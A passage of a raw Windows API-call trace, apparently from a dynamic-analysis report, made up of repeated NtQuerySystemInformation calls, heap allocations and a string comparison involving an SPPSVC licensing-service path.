ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc80, Length=0x28, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0271.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0271.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.333] GetProcessHeap () returned 0x2026c630000 [0271.333] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d656ae0 [0271.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.353] GetProcessHeap () returned 0x2026c630000 [0271.353] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d656b40 [0271.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.354] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.363] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.373] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.383] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 